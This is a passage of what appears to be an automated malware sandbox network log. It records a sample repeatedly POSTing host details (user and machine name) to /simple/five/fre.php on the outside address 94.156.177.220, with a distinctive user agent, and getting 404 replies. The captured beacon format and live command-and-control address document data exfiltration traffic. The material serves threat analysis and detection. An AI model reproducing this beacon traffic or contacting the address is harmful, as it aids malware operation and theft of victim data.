                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  19192.168.2.44975594.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:25.959554911 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:25.965151072 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:26.942964077 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:26 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  20192.168.2.44975694.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:27.712598085 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:27.717962980 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:28.695118904 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:28 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  21192.168.2.44975794.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:29.857386112 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:29.863609076 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:30.839289904 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:30 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  22192.168.2.44975894.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:30.991204977 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:30.997406006 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:32.009637117 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:31 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  23192.168.2.44975994.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:32.170057058 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:32.176321983 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:33.137624025 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:32 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  24192.168.2.44976094.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:33.682240009 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:33.687798977 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:34.643838882 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:34 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  25192.168.2.44976194.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:34.804533958 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:34.810261011 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:35.764405012 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:35 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  26192.168.2.44976294.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:35.911026955 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:35.916781902 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:36.884356022 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:36 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  27192.168.2.44976394.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:37.040622950 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:37.046303034 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:38.036004066 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:37 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  28192.168.2.44976494.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:38.195120096 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:38.200499058 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:39.179270029 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:39 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  29192.168.2.44976594.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:39.816567898 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:39.822242975 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:40.795761108 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:40 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  30192.168.2.44976694.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:40.945086002 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:40.950582981 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:42.075862885 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:41 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  31192.168.2.44976794.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:42.429171085 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:42.434571028 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:43.413599014 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:43 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  32192.168.2.44976894.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:43.570328951 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:43.576011896 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:44.566714048 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:44 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  33192.168.2.44976994.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:44.747003078 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:44.753726006 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:45.718827009 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:45 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  34192.168.2.44977094.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:45.962044954 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:45.967782974 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:46.934838057 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:46 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  35192.168.2.44977194.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:47.084693909 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:47.090625048 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:48.041701078 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:47 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  36192.168.2.44977294.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:48.360626936 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:48.628753901 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:49.291296959 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:49 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  37192.168.2.44977394.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
